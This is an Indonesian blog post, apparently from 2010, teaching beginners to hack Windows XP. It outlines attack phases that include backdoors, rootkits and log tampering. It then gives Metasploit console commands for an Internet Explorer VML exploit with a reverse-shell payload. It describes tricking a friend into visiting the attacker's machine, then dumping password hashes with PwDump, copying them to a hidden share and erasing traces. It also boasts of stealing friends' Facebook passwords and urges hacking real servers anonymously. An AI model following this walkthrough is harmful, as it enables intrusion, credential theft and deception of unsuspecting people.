welcome to the blog "THOTHOEGHT, blog to share knowledgeblog created to promote and disseminate the best science in the field of education, research, general knowledge and specific
want to translate please choose Language
English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified

Rabu, 02 Juni 2010

TIP DAN TRIK


BELAJAR MENJADI HACKER
by thoeght

Dalam suatu kesempatan saat magang, saya pernah melihat seorang IT keamanan jaringan melakukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya ngerti dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus.
Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework
Peristiwa tersebut menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya otak-atik dan bermain angka serta lambang. Tulisan ini memberikan gambaran mengenai bagaimana salah satu cara yang umum dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang.
Langkah dibawah ini merupakan cara ’standar’, hacking sebenarnya tidak harus selalu sesuai dengan ’standar’ ini.
Artikel ini ditujukan bagi pemula, dan disusun oleh seorang pemula yang disebarluaskan di blog pemula (he...he.....). Ditulis untuk pengetahuan semata dan menambah wawasan mengenai hacker. Untuk temen2 yg udah ahli, gak usah digapai, tapi dibaca juga gpp…. Kalau perlu kasih komentar dan saran
hacking adalah mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, melalui lambang angka dan huruf yang semua orang tidak mengerti (aku juga sampai saat ini gak ngerti kenapa kok ada bahasa seperti itu). Sesuatunya apa? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi saya kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, tanya aja ke mbah google (ketik How to Become A Hacker). Dengan demikian bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol punya orang (program maksudnya)? belum tentu kan….

Pada artikel ini, saya ingin membagi pengalaman mengenai Hacking, walaupun sampai saat ini saya belum pernah nge-Hack ke server orang (belum berhasil maksudnya he...he....). tapi klo curi akun password di facebook milik teman bisa kok kwkwkwkw, hati-hati yang kenal ma aku di facebook.
Salah satu cara untuk mencoba simulasi Hack yaitu dengan membuat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack betulan… apalagi klo di rumah teman-teman ada jaringan.
Sulit khan?????????
Baiklah, sekarang waktunya melakukan aksi… are you ready let’s go do it
1. Fase Persiapan
- Mengumpulkan informasi sebanyak-banyaknya
- Secara Aktif : - portscanning
- network mapping
- OS Detection
- application fingerprinting

Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat
- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)
- via internet registries (informasi domain, IP Addres)
- Website yang menjadi terget

2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->
$gcc -o exploit exploit.c
$./exploit
# hostname (# tanda mendapatkan akses root)
remote host -> $gcc -o exploit exploit.c
$./exploit -t www.target.com
# (klo beruntung mendapatkan akes root)
~ Brute Force
- Secara berulang melakukan percobaan otentifikasi.
- Menebak username dan password (lebih mudah pinjam CD teman yang sudah biasa hack)
- Cracking password file
~ Social Engineering
- Memperdayai user untuk memeberi tahu Username dan password
- Intinya ngibulin user….

3. Fase Setelah Eksekusi
~ Menginstall backdoor, trojans, dan rootkit
~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin
~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya yaitu cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraktekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot.
Saran saya, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare
Baiklah skarang kita mulai berpratik (klo berhasil syukur klo gak yang dicoba terus sampai berhasil, OK!!!!!!!)
Disini saya sengaja mengulas pembahasan ini menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research. (maklum gak bias bahasa inggris jadi takut salah arti jika diterjemahkan)

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit diotak-atikk, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ‘mfsconsole’!

main1.JPG

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.

Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

Untuk melihat info dari exploit ini gunakan perintah :

msf > info ie_vml_rectfill

Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).


Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit

Hasilnya akan dalam bentuk gambar

Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D

Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

Crack sekalian Password!

Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip hampir sama tentang Hack Win XP SP2 Password (dah tahu khan), tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!

Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :

pwdump.JPG

Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah

C:\temp\Pwdump –o pass.txt 127.0.0.1

Klo berhasil akan ada gambar klo dialam kode dos seperti ini dump1.JPG

Lalu copy file pass.txt ke komputer kita

C:\temp\copy pass.txt z:

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

clean.JPG

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).

Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

Happy Hacking….. (tapi yang perlu diingat bahwa saya bukan mengajari anda untuk menoprak komputer orang lho.... ini sekedar pengetahuan aja)
Untuk itu biar saya gak dicap sebagai hacker maka saya akan memberikan tip agar anda aman dari hacking/exploit diatas

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.
2. Patch Windows anda.
3. Gunakan antivirus dengan update terbaru
4. Hati2 terhadap teman anda sendiri.. waspadalah!! He…he….. (pengalaman pribadi nih)
Selengkapnya...

INFORMASI

Bagi yang membutuhkan bantuan Olah Data Penelitian, Skripsi, Tesis Makalah, Modul Pembelajaran dan Materi Pembelajaran Power Point hubungi kami di +06281915544049 atau kirim email ke Nick.thoeght@yahoo.co.id atau thoeght@gmail.com

Article Computer

This page is intended to explore different things about computers like computer software, and hardware Programes. with the knowledge that we will be able to take care of our computers properly

Article Education

this page is contain about anything of education. such of article education, method education,etc if you search anything about education, you will get in this page and if you have idea, discussion of education i hope you tell me and we are can improve knowledge and thinking

Artikel Olahraga

This article presents the various fields of knowledge, especially in sports such as game rules, history, news or sports information, and others. our knowledge will increase knowledge of sport that will develop. we will be able to know the development of sport in both Indonesia and foreign countries

Artikel Pengetahuan

Containing various kinds of knowledge both of a general or specific nature.
all obtained from various sources and is expected to broaden dapt science especially in the era of 20th century. with extensive knowledge we will be able to follow developments in science and technology in modern times it is necessary

Artikel Penelitian

Special pages to research whether the research instrument making, if the research data. This is made to help all in terms of research, especially research thesis, paper. in this article devoted to the processing of research data using SPSS or SPS, research methodology, etc.

Tips and Triks

Specially created to help my friends in terms of managing blogs, websites and calling a problem with a computer or laptop, and so comfortable in the rounds in cyberspace. of this article we will also supply to now the virtual world will be safe from a variety of things
 

Copyright © 2009 by "THOE-THOEGHT"